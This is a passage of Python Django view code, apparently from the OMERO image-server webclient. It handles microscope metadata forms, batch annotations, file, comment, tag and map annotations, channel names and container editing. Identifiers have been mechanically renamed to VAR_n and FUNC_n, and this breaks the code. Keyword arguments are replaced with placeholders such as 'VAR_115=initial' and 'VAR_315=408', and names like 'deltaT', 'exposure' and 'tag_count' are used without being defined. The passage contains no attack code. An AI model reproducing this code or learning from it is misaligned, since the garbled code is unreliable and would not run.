VAR_6.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
VAR_6.getEnumerationEntries("ContrastMethodI")
),
"modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
},
auto_id=False,
)
if VAR_25 is None:
VAR_424 = VAR_353.getLightPath()
if VAR_424 is not None:
VAR_391["form_dichroic"] = None
VAR_391["form_excitation_filters"] = list()
VAR_391["form_emission_filters"] = list()
VAR_434 = VAR_424.getDichroic()
if VAR_434 is not None:
VAR_391["form_dichroic"] = MetadataDichroicForm(
VAR_115={"dichroic": VAR_434}
)
VAR_435 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
for f in VAR_424.getEmissionFilters():
VAR_391["form_emission_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
for f in VAR_424.getExcitationFilters():
VAR_391["form_excitation_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
VAR_425 = VAR_353.getDetectorSettings()
if (
VAR_425._obj is not None
and VAR_425.getDetector()
):
VAR_391["form_detector_settings"] = MetadataDetectorForm(
VAR_115={
"detectorSettings": VAR_425,
"detector": VAR_425.getDetector(),
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(VAR_6.getEnumerationEntries("Binning")),
}
)
VAR_426 = VAR_353.getLightSourceSettings()
if (
VAR_426 is not None
and VAR_426._obj is not None
):
VAR_436 = VAR_426.getLightSource()
if VAR_436 is not None:
VAR_439 = VAR_136
if VAR_436.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif VAR_436.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_391["form_light_source"] = MetadataLightSourceForm(
VAR_115={
"lightSource": VAR_436,
"lightSourceSettings": VAR_426,
"lstypes": VAR_439,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
VAR_6.getEnumerationEntries("PulseI")
),
}
)
VAR_391["label"] = ch.getLabel()
VAR_351 = ch.getColor()
VAR_391["color"] = VAR_351 is not None and VAR_351.getHtml() or None
VAR_392 = (
VAR_104.image
and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
VAR_393 = []
for pi in VAR_392:
VAR_427 = pi.getDeltaT(units="SECOND")
VAR_428 = pi.getExposureTime(units="SECOND")
if VAR_427 is None and VAR_428 is None:
continue
if VAR_427 is not None:
VAR_427 = deltaT.getValue()
if VAR_428 is not None:
VAR_428 = exposure.getValue()
VAR_393.append(
{"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
)
VAR_391["plane_info"] = VAR_393
VAR_134.append(VAR_391)
try:
VAR_142 = VAR_104.well.getWellSample().image()
except Exception:
VAR_142 = VAR_104.image
if VAR_25 is None: # 9853
if VAR_142.getObjectiveSettings() is not None:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_127 = MetadataObjectiveSettingsForm(
VAR_115={
"objectiveSettings": VAR_142.getObjectiveSettings(),
"objective": VAR_142.getObjectiveSettings().getObjective(),
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
if VAR_142.getImagingEnvironment() is not None:
VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
if VAR_142.getStageLabel() is not None:
VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
VAR_354 = VAR_142.getInstrument()
if VAR_354 is not None:
if VAR_354.getMicroscope() is not None:
VAR_128 = MetadataMicroscopeForm(
VAR_115={
"microscopeTypes": list(
VAR_6.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": VAR_354.getMicroscope(),
}
)
VAR_394 = VAR_354.getObjectives()
for o in VAR_394:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_429 = MetadataObjectiveForm(
VAR_115={
"objective": o,
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
},
auto_id=False,
)
VAR_129.append(VAR_429)
VAR_395 = list(VAR_354.getFilters())
if len(VAR_395) > 0:
for f in VAR_395:
VAR_437 = MetadataFilterForm(
VAR_115={
"filter": f,
"types": list(
VAR_6.getEnumerationEntries("FilterTypeI")
),
},
auto_id=False,
)
VAR_131.append(VAR_437)
VAR_396 = list(VAR_354.getDichroics())
for VAR_364 in VAR_396:
VAR_430 = MetadataDichroicForm(
VAR_115={"dichroic": VAR_364}, auto_id=False
)
VAR_132.append(VAR_430)
VAR_397 = list(VAR_354.getDetectors())
if len(VAR_397) > 0:
for VAR_364 in VAR_397:
VAR_438 = MetadataDetectorForm(
VAR_115={
"detectorSettings": None,
"detector": VAR_364,
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
},
auto_id=False,
)
VAR_133.append(VAR_438)
VAR_398 = list(VAR_354.getLightSources())
if len(VAR_398) > 0:
for laser in VAR_398:
VAR_439 = VAR_136
if laser.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif laser.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_440 = MetadataLightSourceForm(
VAR_115={
"lightSource": laser,
"lstypes": VAR_439,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(VAR_6.getEnumerationEntries("PulseI")),
},
auto_id=False,
)
VAR_135.append(VAR_440)
VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
if VAR_23 not in ("share", "discussion", "tag"):
VAR_53["form_channels"] = VAR_134
VAR_53["form_environment"] = VAR_126
VAR_53["form_objective"] = VAR_127
VAR_53["form_microscope"] = VAR_128
VAR_53["form_instrument_objectives"] = VAR_129
VAR_53["form_filters"] = VAR_131
VAR_53["form_dichroics"] = VAR_132
VAR_53["form_detectors"] = VAR_133
VAR_53["form_lasers"] = VAR_135
VAR_53["form_stageLabel"] = VAR_130
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_53 = {
"template": "webclient/annotations/original_metadata.html",
"imageId": VAR_142.getId(),
}
try:
VAR_181 = VAR_142.loadOriginalMetadata()
if VAR_181 is not None:
VAR_53["original_metadata"] = VAR_181[0]
VAR_53["global_metadata"] = VAR_181[1]
VAR_53["series_metadata"] = VAR_181[2]
except omero.LockTimeout:
return HttpResponse(VAR_286="LockTimeout", VAR_315=408)
return VAR_53
def FUNC_43(VAR_2, VAR_6=None):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_106 = (
len(VAR_71.getlist("image")) > 0
and list(VAR_6.getObjects("Image", VAR_71.getlist("image")))
or list()
)
VAR_107 = (
len(VAR_71.getlist("dataset")) > 0
and list(VAR_6.getObjects("Dataset", VAR_71.getlist("dataset")))
or list()
)
VAR_108 = (
len(VAR_71.getlist("project")) > 0
and list(VAR_6.getObjects("Project", VAR_71.getlist("project")))
or list()
)
VAR_109 = (
len(VAR_71.getlist("screen")) > 0
and list(VAR_6.getObjects("Screen", VAR_71.getlist("screen")))
or list()
)
VAR_110 = (
len(VAR_71.getlist("plate")) > 0
and list(VAR_6.getObjects("Plate", VAR_71.getlist("plate")))
or list()
)
VAR_111 = (
len(VAR_71.getlist("acquisition")) > 0
and list(VAR_6.getObjects("PlateAcquisition", VAR_71.getlist("acquisition")))
or list()
)
VAR_112 = (
len(VAR_71.getlist("share")) > 0 and [VAR_6.getShare(VAR_71.getlist("share")[0])] or list()
)
VAR_113 = (
len(VAR_71.getlist("well")) > 0
and list(VAR_6.getObjects("Well", VAR_71.getlist("well")))
or list()
)
return {
"image": VAR_106,
"dataset": VAR_107,
"project": VAR_108,
"screen": VAR_109,
"plate": VAR_110,
"acquisition": VAR_111,
"well": VAR_113,
"share": VAR_112,
}
def FUNC_44(VAR_2):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_114 = {
"images": VAR_71.getlist("image"),
"datasets": VAR_71.getlist("dataset"),
"projects": VAR_71.getlist("project"),
"screens": VAR_71.getlist("screen"),
"plates": VAR_71.getlist("plate"),
"acquisitions": VAR_71.getlist("acquisition"),
"wells": VAR_71.getlist("well"),
"shares": VAR_71.getlist("share"),
}
return VAR_114
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
VAR_143 = FUNC_43(VAR_2, VAR_6)
VAR_144 = []
VAR_145 = []
VAR_146 = set()
VAR_147 = False
for VAR_312 in VAR_143:
VAR_144 += ["%s=%s" % (VAR_312, o.id) for o in VAR_143[VAR_312]]
for o in VAR_143[VAR_312]:
VAR_146.add(o.getDetails().group.id.val)
if not o.canAnnotate():
VAR_147 = (
"Can't add annotations because you don't" " have permissions"
)
VAR_145.append({"type": VAR_312.title(), "id": o.id, "name": o.getName()})
VAR_148 = "&".join(VAR_144)
VAR_149 = "|".join(VAR_144).replace("=", "-")
if len(VAR_146) == 0:
if (
len(VAR_2.GET.getlist("tag")) > 0
or len(VAR_2.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
else:
return handlerInternalError(VAR_2, "No objects found")
VAR_150 = list(VAR_146)[0]
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
VAR_104 = BaseContainer(VAR_6)
VAR_117 = VAR_104.listFigureScripts(VAR_143)
VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
VAR_152 = None
VAR_153 = []
if "image" in VAR_143 and len(VAR_143["image"]) > 0:
VAR_153 = [VAR_320.getId() for VAR_320 in VAR_143["image"]]
if len(VAR_153) > 0:
VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
VAR_152["count"] += VAR_283["count"]
VAR_152["size"] += VAR_283["size"]
VAR_53 = {
"iids": VAR_153,
"obj_string": VAR_148,
"link_string": VAR_149,
"obj_labels": VAR_145,
"batch_ann": True,
"figScripts": VAR_117,
"canExportAsJpg": VAR_151,
"filesetInfo": VAR_152,
"annotationBlocked": VAR_147,
"differentGroups": False,
}
if len(VAR_146) > 1:
VAR_53["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
VAR_53["differentGroups"] = True # E.g. don't run VAR_203 etc
VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
VAR_53["template"] = "webclient/annotations/FUNC_45.html"
VAR_53["webclient_path"] = VAR_352("webindex")
VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
FUNC_43(VAR_2, VAR_6)
)
return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
if VAR_155 == 0:
raise Http404("Need to specify objects via e.g. ?VAR_142=1")
VAR_104 = None
if VAR_155 == 1:
for VAR_433 in VAR_114:
if len(VAR_114[VAR_433]) > 0:
VAR_28 = VAR_433[:-1] # "images" -> "image"
VAR_29 = VAR_114[VAR_433][0]
break
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if VAR_28 == "tagset":
VAR_28 = "tag"
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_94[VAR_347(VAR_28)] = int(VAR_29)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_104 is not None:
VAR_284 = VAR_104.getFilesByObject()
else:
VAR_104 = BaseContainer(VAR_6)
for VAR_215, VAR_143 in VAR_154.items():
if len(VAR_143) > 0:
VAR_284 = VAR_104.getFilesByObject(
VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
)
break
VAR_115["files"] = VAR_284
if VAR_2.method == "POST":
VAR_285 = FilesAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_285.is_valid():
VAR_284 = VAR_285.cleaned_data["files"]
VAR_355 = []
if VAR_284 is not None and len(VAR_284) > 0:
VAR_355 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
VAR_234 = (
"annotation_file" in VAR_2.FILES
and VAR_2.FILES["annotation_file"]
or None
)
if VAR_234 is not None and VAR_234 != "":
VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
VAR_355.append(VAR_399)
return JsonResponse({"fileIds": VAR_355})
else:
return HttpResponse(VAR_285.errors)
else:
VAR_285 = FilesAnnotationForm(VAR_115=initial)
VAR_53 = {"form_file": VAR_285}
VAR_54 = "webclient/annotations/files_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Only POST supported")
VAR_156 = getIntOrDefault(VAR_2, "rating", 0)
VAR_154 = FUNC_43(VAR_2, VAR_6)
for VAR_311, VAR_143 in VAR_154.items():
for o in VAR_143:
o.setRating(VAR_156)
return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Unbound instance of VAR_22 not available.")
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
"shares": VAR_154["share"],
}
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_157 = CommentAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_157.is_valid():
VAR_286 = VAR_157.cleaned_data["comment"]
if VAR_286 is not None and VAR_286 != "":
if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
VAR_400 = VAR_154["share"][0].id
VAR_104 = BaseShare(VAR_6, VAR_400)
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_352("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
VAR_53 = {
"tann": VAR_402,
"added_by": VAR_6.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
VAR_104 = BaseContainer(VAR_6)
VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
return VAR_53
else:
return HttpResponse(VAR_347(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404(
"Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
)
VAR_154 = FUNC_43(VAR_2, VAR_6)
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_158 = VAR_2.POST.get("mapAnnotation")
VAR_158 = json.loads(VAR_158)
VAR_159 = VAR_2.POST.getlist("annId")
VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
if len(VAR_159) == 0 and len(VAR_158) > 0:
VAR_287 = VAR_2.POST.get("duplicate", "false")
VAR_287.lower() == "true"
if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
VAR_287 = True
if VAR_287:
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
VAR_38.linkAnnotation(VAR_180)
else:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_38.linkAnnotation(VAR_180)
else:
for VAR_34 in VAR_159:
VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
if VAR_180 is None:
continue
if len(VAR_158) > 0:
VAR_180.setValue(VAR_158)
VAR_180.save()
else:
VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
if len(VAR_158) == 0:
VAR_159 = None
return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
VAR_101 = FUNC_0(VAR_2, "group", -1)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_347(VAR_101))
try:
VAR_177 = int(VAR_2.GET.get("offset"))
VAR_88 = int(VAR_2.GET.get("limit", 1000))
except Exception:
VAR_177 = VAR_88 = None
VAR_160 = VAR_2.GET.get("jsonmode")
if VAR_160 == "tagcount":
VAR_288 = VAR_6.getTagCount()
return dict(VAR_288=tag_count)
VAR_104 = BaseContainer(VAR_6)
VAR_104.loadTagsRecursive(eid=-1, VAR_177=offset, VAR_88=limit)
VAR_161 = VAR_104.tags_recursive
VAR_162 = VAR_104.tags_recursive_owners
if VAR_160 == "tags":
VAR_71 = list((VAR_320, VAR_433, o, s) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
return VAR_71
elif VAR_160 == "desc":
return dict((VAR_320, VAR_364) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
elif VAR_160 == "owners":
return VAR_162
return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
VAR_104 = None
VAR_163 = VAR_6.getEventContext().userId
VAR_164 = []
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_165, VAR_166 = tree.marshal_annotations(
VAR_6,
VAR_44=VAR_114["projects"],
VAR_45=VAR_114["datasets"],
VAR_46=VAR_114["images"],
VAR_47=VAR_114["screens"],
VAR_48=VAR_114["plates"],
VAR_85=VAR_114["acquisitions"],
VAR_86=VAR_114["wells"],
VAR_89="tag",
VAR_88=VAR_1,
)
VAR_167 = {}
for VAR_232 in VAR_166:
VAR_167[VAR_232["id"]] = VAR_232
if VAR_155 > 1:
VAR_289 = {}
for VAR_433 in VAR_165:
VAR_356 = VAR_433["id"]
if VAR_356 not in VAR_289:
VAR_289[VAR_356] = 0
if VAR_433["link"]["owner"]["id"] == VAR_163:
VAR_289[VAR_356] += 1
VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
VAR_168 = []
for tag in VAR_165:
VAR_290 = tag["link"]["owner"]["id"]
VAR_103 = VAR_167[VAR_290]
VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
VAR_292 = True
VAR_293 = tag["link"]["date"]
VAR_294 = VAR_290 == VAR_163
VAR_168.append(
(tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
)
VAR_168.sort(VAR_312=lambda x: x[0])
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
if VAR_2.method == "POST":
VAR_295 = TagsAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
VAR_296 = NewTagsAnnotationFormSet(
prefix="newtags", VAR_158=VAR_2.POST.copy()
)
if VAR_295.is_valid() and VAR_296.is_valid():
VAR_357 = [stag[0] for stag in VAR_168 if stag[5]]
VAR_357 = list(set(VAR_357))
VAR_358 = list(VAR_295.cleaned_data["tags"])
VAR_164 = [tag for tag in VAR_358 if tag not in VAR_357]
VAR_359 = [tag for tag in VAR_357 if tag not in VAR_358]
VAR_104 = BaseContainer(VAR_6)
if VAR_164:
VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
VAR_360 = []
for VAR_22 in VAR_296.forms:
VAR_360.append(
VAR_104.createTagAnnotations(
VAR_22.cleaned_data["tag"],
VAR_22.cleaned_data["description"],
VAR_154,
tag_group_id=VAR_22.cleaned_data["tagset"],
)
)
for remove in VAR_359:
VAR_403 = BaseContainer(VAR_6, tag=remove)
VAR_403.remove(
[
"%s-%s" % (VAR_215, VAR_38.id)
for VAR_215, VAR_143 in VAR_154.items()
for VAR_38 in VAR_143
],
tag_owner_id=VAR_163,
)
return JsonResponse({"added": VAR_164, "removed": VAR_359, "new": VAR_360})
else:
return HttpResponse(VAR_347(VAR_295.errors))
else:
VAR_295 = TagsAnnotationForm(VAR_115=initial)
VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
VAR_53 = {
"form_tags": VAR_295,
"newtags_formset": VAR_296,
"selected_tags": VAR_168,
}
VAR_54 = "webclient/annotations/tags_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
VAR_169 = VAR_142.getSizeC()
VAR_170 = {}
VAR_171 = {}
for VAR_320 in range(VAR_169):
VAR_297 = VAR_2.POST.get("channel%d" % VAR_320, None)
if VAR_297 is not None:
VAR_297 = smart_str(VAR_297)[:255] # Truncate to fit in DB
VAR_170["channel%d" % VAR_320] = VAR_297
VAR_171[VAR_320 + 1] = VAR_297
if VAR_2.POST.get("confirm_apply", None) is not None:
VAR_298 = VAR_2.POST.get("parentId", None)
if VAR_298 is not None:
VAR_255 = VAR_298.split("-")[0].title()
VAR_361 = VAR_241(VAR_298.split("-")[1])
VAR_299 = VAR_6.setChannelNames(VAR_255, [VAR_361], VAR_171, channelCount=VAR_169)
else:
VAR_299 = VAR_6.setChannelNames("Image", [VAR_142.getId()], VAR_171)
VAR_172 = {"channelNames": VAR_170}
if VAR_299:
VAR_172["imageCount"] = VAR_299["imageCount"]
VAR_172["updateCount"] = VAR_299["updateCount"]
return VAR_172
else:
return {"error": "No VAR_413 found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
VAR_54 = None
VAR_104 = None
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_29 = int(VAR_29)
VAR_94[VAR_347(VAR_28)] = VAR_29
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
elif VAR_28 in ("share", "sharecomment", "chat"):
VAR_104 = BaseShare(VAR_6, VAR_29)
else:
VAR_104 = BaseContainer(VAR_6)
VAR_22 = None
if VAR_27 == "addnewcontainer":
if not VAR_2.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, VAR_315=405
)
VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_347(VAR_22.cleaned_data)))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_362 = VAR_22.cleaned_data["description"]
VAR_103 = VAR_22.cleaned_data["owner"]
if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_40 = VAR_104.createDataset(VAR_3, VAR_362, VAR_103=owner)
elif VAR_28 == "tagset" and VAR_29 > 0:
VAR_40 = VAR_104.createTag(VAR_3, VAR_362, VAR_103=owner)
elif VAR_2.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
VAR_441 = VAR_2.POST.get("folder_type")
if VAR_441 == "dataset":
VAR_40 = VAR_104.createDataset(
VAR_3,
VAR_362,
VAR_103=owner,
img_ids=VAR_2.POST.getlist("image", None),
)
else:
VAR_40 = VAR_6.createContainer(
VAR_441, VAR_3, VAR_362, VAR_103=owner
)
else:
return HttpResponseServerError("Object does not exist")
VAR_363 = {"bad": "false", "id": VAR_40}
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
elif VAR_27 == "edit":
if VAR_29 is None:
raise Http404("No share ID")
if VAR_28 == "share" and int(VAR_29) > 0:
VAR_54 = "webclient/public/share_form.html"
VAR_104.getMembers(VAR_29)
VAR_104.getComments(VAR_29)
VAR_404 = list(VAR_6.getExperimenters())
VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
VAR_115 = {
"message": VAR_104.share.message,
"expiration": "",
"shareMembers": VAR_104.membersInShare,
"enable": VAR_104.share.active,
"experimenters": VAR_404,
}
if VAR_104.share.getExpireDate() is not None:
VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
"%Y-%m-%d"
)
VAR_22 = ShareForm(VAR_115=initial) # 'guests':share.guestsInShare,
VAR_53 = {"manager": VAR_104, "form": VAR_22}
elif VAR_27 == "save":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if VAR_28 == "share":
VAR_404 = list(VAR_6.getExperimenters())
VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
VAR_22 = ShareForm(
VAR_115={"experimenters": VAR_404}, VAR_158=VAR_2.POST.copy()
)
if VAR_22.is_valid():
VAR_0.debug("Update share: %s" % (VAR_347(VAR_22.cleaned_data)))
VAR_382 = VAR_22.cleaned_data["message"]
VAR_442 = VAR_22.cleaned_data["expiration"]
VAR_64 = VAR_22.cleaned_data["members"]
VAR_443 = VAR_22.cleaned_data["enable"]
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_352("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_104.updateShareOrDiscussion(
VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
)
VAR_71 = "enable" if VAR_443 else "disable"
return HttpResponse(VAR_71)
else:
VAR_54 = "webclient/public/share_form.html"
VAR_53 = {"share": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editname":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
if VAR_28 == "tag":
VAR_445 = VAR_38.textValue
else:
VAR_445 = VAR_38.getName()
VAR_22 = ContainerNameForm(VAR_115={"name": VAR_445})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savename":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_363 = {"bad": "false", "o_type": VAR_28}
VAR_104.updateName(VAR_28, VAR_3)
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editdescription":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savedescription":
if not VAR_2.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (VAR_27, VAR_28, VAR_29)
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
VAR_362 = VAR_22.cleaned_data["description"]
VAR_104.updateDescription(VAR_28, VAR_362)
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
